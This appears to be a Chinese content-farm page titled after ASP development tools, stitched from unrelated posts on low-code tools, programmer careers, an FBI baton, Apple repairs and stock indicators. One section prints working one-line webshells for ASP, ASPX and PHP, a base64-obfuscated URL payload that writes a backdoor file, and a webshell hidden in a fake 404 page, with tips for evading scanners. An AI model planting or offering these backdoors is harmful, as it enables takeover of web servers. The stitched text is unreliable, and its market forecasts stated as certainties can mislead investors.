摘要： 8月科學教育網小李來為大家講解下。asp開發工具（asp編寫軟件這個很多人還不知道,現在讓我們一起來看看吧！人、技術、過程、工具、質量-“以人為本”的工程哲學-iPerson人、技...

8月科學教育網小李來為大家講解下。asp開發工具（asp編寫軟件這個很多人還不知道,現在讓我們一起來看看吧！

人、技術、過程、工具、質量-“以人為本”的工程哲學-iPerson

人、技術、過程、工具、質量-“以人為本”的工程哲學

工程哲學：以人為本：

市場是人的需求形成的；

產品是給人做的；

項目是人做的；

人能掌握的技術才有實用性；

人能執行的過程才能落地；

人能使用的工具才是好工具。

工程的價值觀：五人原則

看人行：看看工程師和用戶的真實的工作情況；

知人難：真實的感受他們的難處；

做人事：給他們推薦具有可執行性的流程和任務；

說人話：用大家能夠聽懂的語言交流。

看到低代碼開發我就想到Dreamweaver，當年我初學ASP時，用DW做了個論壇，那時候DW版本還是3.0、4.0。在DW完全可視化的狀態下，可以鼓搗出一個完整的，具有互動功能的網站出來。各種元素屬性、樣式、行為都可以像填寫表格一樣直觀操作。但現在DW已經日薄西山，真正開發環境沒有幾個人用它了。究其原因，一是可視化操作并不能完全適應千奇百怪的需求，二是可視化生成的代碼比較臃腫。雖然它可以在純代碼環境下編寫項目，但跟其他集成開發環境相比，它這方面卻又顯得薄弱。

如今低代碼工具和平臺忽然興起，被很多人說成是軟件開發的趨勢。但我卻有些擔心，首先他們能做到DW當初的功能和自由度嗎？其次即使能比肩DW，能解決DW的天生缺陷嗎？從我多年的軟件開發經驗來看，需求是千變萬化的，而且有很多是稀奇古怪的，需要深入代碼層面去解決問題。還有就是性能方面的問題，可視化生成的代碼肯定比純手寫的代碼要臃腫，進而降低運行效率。然后還有擴展性問題，隨著項目需求越來越精細化，低代碼平臺能否持續提供支撐？我覺得現在有些低代碼工具和平臺可能走錯了方向。

目前來看，行業內卷，做PLC調試工作，因目前項目暫停，準備剛好可以通過這段時間來學習，對于asp.net core， blazer ，vue，有些傻傻分不清。今天看了一下前端開發，準備做一下權限管理。

在網上看了需要安裝腳手架，原來輸入大寫的NODE一直不行，重新安裝了好幾遍，最后才發現要輸入小寫的，也不知道這樣是否就以為著腳手架安裝成功了。

年紀大了學習有點吃力了。給自己加油，第一步就是要學會做人員權限管理。同時熟悉工具的使用

#輕兵器科普##輕兵器愛好者#新時代更需“老派作風”，FBI換裝新型ASP特工甩棍！這種新型甩棍稱為A40特工型，收縮時全長只有203毫米，便于攜帶，通過按鈕釋放裝置，完全伸展后全長可達406毫米。A40的標準版本除鋼制打擊頭外，還采用了鋁合金部件以減輕重量，但FBI采購的版本完全由4140鋼制成，以增強打擊力。該版本還配有彈簧夾，便于放在口袋或腰帶中攜帶，非常適合便衣使用。ASP甩棍和OC噴霧劑、泰瑟槍一起，曾是美國執法部門標配的“非殺傷性”警用武器，最常見的一種輕量型，全重為255克，收縮狀態203毫米，完全伸展后533毫米。但近年來ASP和OC噴霧劑一度被視為過時產品。其實ASP除控制暴力事件、驅散人群外，還可以作為撬杠、指示棒以及破窗工具，用途廣泛。為此，廠商特意在一份聲明中說：“能夠繼續得到聯邦調查局男女特工人員的信任，為他們提供履行職責和保障自身安全所需的設備和培訓，這是一種莫大的榮譽。”該公司稱，FBI是持續采購更多甩棍的主要聯邦機構之一。

奔四程序員，決定再深入學習一次單片機。

我算是比較早的一批程序員了，最早的時候使用ASP、PHP、VB，后來轉向c#，最近十來年則是以JAVA、PHP為主。其實小城市程序員真是啥都要干，jQuery、angular、vue、安卓、iOS我也都開發了大量代碼。

五六年前我曾自學過一次STM32，并且把學習過程寫了一個小系列的博客，當時用STM32最小板學習了串口、GPIO口、RAM和FLASH下載調試等技術。不過實際工作中用不到，學到這里就沒堅持下去。上學的時候課程還是8086單片機，更是忘的影都沒了。上學時我學的電子專業，電路硬件知識還了解一點皮毛，也做過一些上位機軟件，對硬件通訊并不陌生。

明年就是“不惑”的年齡了，作為最早奔四的80后群體，現在之所以決定再次沖擊STM32開發技術，還是為了日后的職場多留點后路。我在小城市做程序員，其實沒什么核心的科技含量，年齡大了，危機感就愈加強烈。經過仔細觀察，我發現小城市互聯網從業的技術人員雖然薪資整體待遇比嵌入式略高，但可替代性更強，不從業務出發，只看技術的話，三四十歲程序員和二十多歲優秀的程序員比，根本沒什么競爭優勢。

而嵌入式整體就業面要更窄，更像在一個小圈子里流動，這個圈子相對來說就略顯穩定。

我身邊奔四的互聯網從業人員，很多就處于尷尬境地，求職工資太高很多公司給不起，工資太低滿足不了自己生活，高不成、低不就的狀況下，很多程序員干到奔四就走向了自我創業。但創業這事情，真的不是每個人都適合，起碼我是沒有這個信心。

另外嵌入式的技術迭代速度也沒有前端、后端這么瘋狂，開發工具升版速度總體來說不高。未來幾年國內芯片技術可能迎來一波快速發展時期，早點進入這個行業，看看能不能為未來職場留下更多話語權。

技術角度看，我打算把STM32再學深入一點，在之前學習的基礎上，把各種外設通訊、常用傳感器的使用都先學一下。這次使用了普中的STM32-F1開發板，資源比起之前最小板豐富不少，還帶了一個觸摸屏，所以學完基礎部分，再學一下基于操作系統的嵌入式開發。

學完這些，再從應用角度切入risc-v單片機系列的學習，正好身邊有這資源，集團公司旗下有一個團隊做risc-v芯片，最好能想辦法進入某個開發項目，這樣學以致用效果也更好。

學習方式是視頻+動手實踐+看書+寫博客，之前學STM32時寫的博客太粗糙了，這次決心寫得更細致一些。

最近一年左右就這么規劃了，希望能堅持下來。[加油]

一句話木馬原理與攻防

一句話木馬原理很簡單，造型也很簡單，所以造成了它理解起來容易，抵御起來也容易。于是黑白的較量變成了黑帽不斷的構造變形的后門，去隱蔽特征，而白帽則不斷的更新過濾方法，建起更高的城墻。

一、原理簡述

對于不同的語言有不同的構造方法。

基本構造：最開頭構造的是腳本開始的標記

核心部分：獲取并執行得到的內容，通常類似eval、execute等

被執行內容：一般是http等協議接受的值，通常類似request、$_POST等

如果我們通過客戶端向服務器發送被執行內容，那么就會讓服務器執行我們發送的腳本，掛馬就實現了。

/*asp一句話木馬*/<%execute(request("value"))%>

/*php一句話木馬*/

/*aspx一句話木馬*/

<%@?Page?Language="Jscript"%>

<%eval(Request.Item["value"])%>

黑帽子的目的，就是想盡辦法給目標網站插入這么一段會被儲存起來的語句。可以是一個單獨的腳本文件文件（.asp 、.php、.aspx ），或者是隱藏在某些網頁下的文件、代碼等。

其中的value 就是客戶端要發送的內容，然后通過客戶端與服務器建立連接，發送控制腳本。也會涉及到一些任意文件上傳漏洞等。

二、簡單變形

很明顯的 eval 可以成為一個靜態特征碼，webshell掃描工具可以以此為關鍵詞，掃描到這種木馬加以屏蔽。于是可以簡單變形不出現eval：

同理，傳給a值為 @base64_decode(base64編碼過后的eval)。

利用方法：

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

通過對GET請求的URL構造而形成利用，左括號和右括號是URL編碼，解碼回來如下：

?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

PHP接收到GET請求后相當于執行一個assert函數，并把b作為assert的參數。b里面使用略php的base64解碼函數，把部分信息通過base64編碼而繞過掃描，解碼后如下：

?a=assert&b=${fputs(fopen(c.php,w),1)};

執行后當前目錄生成c.php文件并寫入一句話木馬，這已經算是一個非常隱蔽的木馬了。而在PHP 后門的變形之路上，遠遠不止這些，甚至可以自己定義一個加密解密的函數，或者是利用xor, 字符串翻轉，壓縮，截斷重組等等方法來繞過。

三、變形改良

1.404頁面隱藏木馬

????

????

????

Not?Found

The?requested?URL?was?not?found?on?this?server.

????

????@preg_replace("/[pageerror]/e",$_POST['error'],"saft");

????header('HTTP/1.1?404?Not?Found');

?>

一般404頁面放好后，很少有人會定期對404頁面進行檢查和修改。

如果在404頁面掛上了一句話后門，一方面不會被發現，另一方面，黑帽子很容易能定位到并連接上服務器。

詳情：網頁鏈接

【#蘋果宣布將推出自助維修計劃#，網友：為了賺更多】

歐界報道：

11月17日，蘋果宣布將推出自助維修計劃，這項計劃將從iPhone 12 與 iPhone 13 開始。個人消費者與超過 5000 家 Apple 授權服務提供商（AASP）和 2800 家獨立維修服務提供商一樣可以獲取零件、工具與維修手冊，進行自助維修。

但是部分網友認為蘋果此舉是為了賺更多錢。大部分的人都不具備專業的修機技術，很容易把手機修壞，再找蘋果專門的維修店，維修的價格會更高。再者，第三方維修點會全面購買 Apple 官方備件，這無疑是為蘋果備件供應鏈打工。不知道對此，你怎么看呢？

通過數據判斷行情：

1、? M1-M2增速差

是貨幣供應量的活化指標，代表資金流向趨勢，增速差的走勢跟市場行情基本同步，甚至還能提前一點，所以這個指標特別有用。特別是要抓那些大趨勢的拐點，當增速差長期向上或向下然后發生轉折的時候，市場跟著轉勢的可能性就非常大，例如2019年市場增速差見底回升，那么股市其實就很有可能回升。還有市場逆增速差而動，比如2017年，市場一路上揚，增速差一路向下，其實這時候風險就比較大了，所以用增速差來判斷大勢，有著7-8成的勝率。

查M1-M2增速差網站：網頁鏈接

2、? 社融周期

社融周期也就是信用周期，社融向上行情不會太差，社融向下，行情不會太好。社融的用法是排除法，逆社融的行情可能不會長久，比如2017年，社融一路向下，到了2018年就出現了下跌。社融這個數據是存量同比數據，2021年9月已經降到10%，基本算是歷史最低水平，即將跌破2018年底的9.8%，社融這個指標遵循否極泰來的效應，一旦到底，未來必然出現反彈，2018年就比較明顯，一旦社融反彈市場很快就會回來。

而宏觀杠桿率也非常重要，一旦聽到去杠桿這三個字行情通常表現不會太好，特別是債券也會很糟糕。

3、? PPI和銅價

PPI指標是判斷經濟強周期的標志，PPI大幅上升，證明未來強周期可能會出現，比PPI更快速的工具是銅價，銅價上升PPI上升強周期未來上升的概率就會非常大，超過80%，所以一旦看到這兩個指標上升就應該布局強周期板塊，比如有色、鋼鐵、煤炭、化工，或者寬基中的中證紅利指數。

PPI和銅價構筑了一個周期模型，當PPI和銅價飆升時強周期就會出現，如果其中一個指標掉頭向下或出現見頂信號就應該注意周期向下的風險。

4、? 滬深300指數股息率溢價

資產之間價格關系，通常用的指標是滬深300股息率溢價數據，也就是滬深300的股息率除十年期國債收益率，這是比較股債最基礎的邏輯，看誰更有優勢，一旦溢價特別低的時候，說明長期看股市投資就沒有優勢了，預期收益還不如債券。

查看滬深300指數股息率溢價方式：微信-小程序-韭圈-股債性價比-比值-股息率溢價

?

?

投資怎么做預測：

1看政策，政策是會對市場進行逆周期調節的，當經濟變差的時候，未來政策大概率會干預，比如現在，我們就預測，今年底明年初，政策一定會轉向積極，政策不斷釋放利好，降低資金成本，一定會讓市場利率下行，在股債比當中，股市的吸引力會持續提升。所以政策的逆周期變化，是一個比較確定的東西。也是經濟預測中，最重要的一個點。

?

2看情緒，我們經常講，盈虧同源，繁榮始于衰退，衰退的原因就是繁榮，當市場瘋狂之后，必然跟隨的就是暴跌，當市場暴跌之后，未來預期回報就會很高。你與其研究什么天干地支陰陽五行，不如把之前的漲跌幅好好看看，像2019和2020年，連漲了兩年之后，2021年必然會是一個調整年。當大家都知道買白酒穩賺不陪了，那么白酒就肯定要下跌。當大家都追著買新能源，都去炒煤炭，把價格炒上天之后，那么必然就是崩潰。這種預測的勝率是非常大的。

?

3才是看周期，看企業利潤，看企業庫存，看社會融資，說白了也是看企業未來投資的意愿，能反映他們的樂觀程度，如果大家都很不樂觀，庫存很高，業績一天比一天差，那么股市肯定會有下跌。如果都出清了，庫房里沒東西可賣了，開始重新生產，進入主動補庫存，那么未來業績就會釋放。股市預期也會逐漸上來。

?

4、看預期回報，未來行情好不好，取決于有多少預期回報比較高的投資標的，如果預期回報很高，能買的東西多，那么第二年行情就差不了。相反如果可買的東西不多，啥都貴了，也沒什么確定性的機會，那么第二年很可能就是大跌。比如巴菲特在70年代初期解散了巴菲特合伙公司，就是因為他找不到什么可以投資的東西了。后面連續幾年的暴跌，他也就躲過去了。并不是他多能預測，而是策略決定的。當很多東西，都透支了未來幾年的回報，都適合賣出，不適合買入的時候，他的倉位自然就下來了。

?

[玫瑰][玫瑰]女神節節的約會[心][心][心]

本文asp開發工具（asp編寫軟件到此分享完畢，希望對大家有所幫助。